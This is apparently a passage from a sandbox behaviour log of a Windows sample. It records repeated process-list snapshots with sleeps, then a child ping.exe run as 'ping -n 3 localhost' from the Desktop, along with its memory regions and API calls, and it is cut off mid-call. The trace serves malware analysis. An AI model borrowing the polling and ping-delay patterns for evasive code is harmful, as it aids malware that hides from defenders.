CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0173.270] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.375] CloseHandle (hObject=0xbc) returned 1 [0173.375] Sleep (dwMilliseconds=0x12c) [0173.821] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0173.826] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.957] CloseHandle (hObject=0xc4) returned 1 [0173.957] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0173.961] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.095] CloseHandle (hObject=0xbc) returned 1 [0174.095] Sleep (dwMilliseconds=0x12c) [0174.433] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0174.438] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.560] CloseHandle (hObject=0xc4) returned 1 [0174.560] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0174.565] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.694] CloseHandle (hObject=0xbc) returned 1 [0174.694] Sleep (dwMilliseconds=0x12c) [0175.015] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.021] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.119] CloseHandle (hObject=0xc4) returned 1 [0175.120] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.124] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.213] CloseHandle (hObject=0xbc) returned 1 [0175.213] Sleep (dwMilliseconds=0x12c) [0175.525] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.529] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.567] CloseHandle (hObject=0xc4) returned 1 [0175.567] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.572] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.615] CloseHandle (hObject=0xbc) returned 1 [0175.615] Sleep (dwMilliseconds=0x12c) [0175.915] CreateToolhelp32Snapshot 
(dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0175.920] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.960] CloseHandle (hObject=0xc4) returned 1 [0175.960] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0175.965] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.006] CloseHandle (hObject=0xbc) returned 1 [0176.006] Sleep (dwMilliseconds=0x12c) [0176.511] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.516] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.560] CloseHandle (hObject=0xc4) returned 1 [0176.560] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0176.566] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.628] CloseHandle (hObject=0xbc) returned 1 [0176.628] Sleep (dwMilliseconds=0x12c) [0176.981] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0176.986] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.057] CloseHandle (hObject=0xc4) returned 1 [0177.057] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.062] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.140] CloseHandle (hObject=0xbc) returned 1 [0177.140] Sleep (dwMilliseconds=0x12c) [0177.556] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.562] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.601] CloseHandle (hObject=0xc4) returned 1 [0177.601] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0177.607] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.651] CloseHandle (hObject=0xbc) returned 1 [0177.651] Sleep (dwMilliseconds=0x12c) [0177.976] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0177.981] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.059] CloseHandle (hObject=0xc4) returned 1 [0178.059] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0178.064] 
Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.128] CloseHandle (hObject=0xbc) returned 1 [0178.128] Sleep (dwMilliseconds=0x12c) [0178.476] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0178.480] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Process: id = "26" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16760" os_pid = "0xc28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xbcc" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1665 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1666 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1667 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1668 start_va = 0x70000 end_va = 0xaffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1669 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1670 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1671 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1672 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1673 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1674 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1675 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1676 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1677 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1678 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1679 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000000400000" filename = "" Region: id = 1680 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1681 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1682 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1683 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1684 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1685 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1686 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1687 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1688 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = 
"msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1689 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1690 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1691 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1692 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1693 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1694 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1695 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1696 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1697 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") 
Region: id = 1698 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1699 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1700 start_va = 0x120000 end_va = 0x122fff entry_point = 0x120000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1701 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1702 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1703 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1704 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1749 start_va = 0x1120000 end_va = 0x13eefff entry_point = 0x1120000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1750 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1751 start_va = 0x13f0000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 1752 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: 
"c:\\windows\\system32\\wshtcpip.dll") Region: id = 1753 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1754 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1755 start_va = 0x150000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1841 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 1842 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1843 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1882 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1883 start_va = 0x1470000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 1884 start_va = 0x16f0000 end_va = 0x172ffff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 1885 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1895 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" 
Region: id = 1896 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 36 os_tid = 0xc2c [0100.200] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafe34 | out: lpSystemTimeAsFileTime=0xafe34*(dwLowDateTime=0x79baf020, dwHighDateTime=0x1d440a9)) [0100.200] GetCurrentProcessId () returned 0xc28 [0100.200] GetCurrentThreadId () returned 0xc2c [0100.200] GetTickCount () returned 0x23f02 [0100.200] QueryPerformanceCounter (in: lpPerformanceCount=0xafe2c | out: lpPerformanceCount=0xafe2c*=15698900171) returned 1 [0100.200] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0100.201] __set_app_type (_Type=0x1) [0100.201] __p__fmode () returned 0x76b331f4 [0100.201] __p__commode () returned 0x76b331fc [0100.201] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0100.201] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 [0100.201] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.333] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.333] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0100.338] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xaf8c4 | out: phkResult=0xaf8c4*=0x58) returned 0x0 [0100.338] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xaf8b8, lpData=0xaf8c0, lpcbData=0xaf8bc*=0x4 | out: lpType=0xaf8b8*=0x0, lpData=0xaf8c0*=0x0, lpcbData=0xaf8bc*=0x4) returned 0x2 [0100.338] RegCloseKey (hKey=0x58) returned 0x0 [0100.338] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf88c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, 
ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf8b4 | out: ppResult=0xaf8b4*=0x0) returned 11001 [0100.339] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0xaf88c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xaf8b4 | out: ppResult=0xaf8b4*=0x2346f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2347b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2347e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x233a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0100.662] FreeAddrInfoW (pAddrInfo=0x2346f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x2347b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2347e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x233a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0100.662] Icmp6CreateFile () returned 0x238b40 [0100.818] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x234830 [0100.818] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x23ebb0 [0100.819] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.819] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xaf8b4, nSize=0x0, Arguments=0xaf8b0 | out: lpBuffer="XH#") returned 0x19 [0100.819] 
CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x234858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0100.819] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.819] _write (in: _FileHandle=1, _Buf=0x234858*, _MaxCharCount=0x19 | out: _Buf=0x234858*) returned 25 [0100.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.820] LocalFree (hMem=0x234858) returned 0x0 [0100.820] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer="XH#") returned 0x18 [0100.820] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x234858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0100.820] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.820] _write (in: _FileHandle=1, _Buf=0x234858*, _MaxCharCount=0x18 | out: _Buf=0x234858*) returned 24 [0100.820] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.820] LocalFree (hMem=0x234858) returned 0x0 [0100.820] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0100.820] Icmp6SendEcho2 (in: IcmpHandle=0x238b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xaf930, DestinationAddress=0x1c55e0, RequestData=0x234830, RequestSize=0x20, RequestOptions=0xaf8e0, ReplyBuffer=0x23ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x23ebb0) returned 0x1 [0100.821] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xafdb4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.821] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xaf8b8, nSize=0x0, Arguments=0xaf8b4 | out: lpBuffer=" Q#") returned 0x10 [0100.821] CharToOemBuffA 
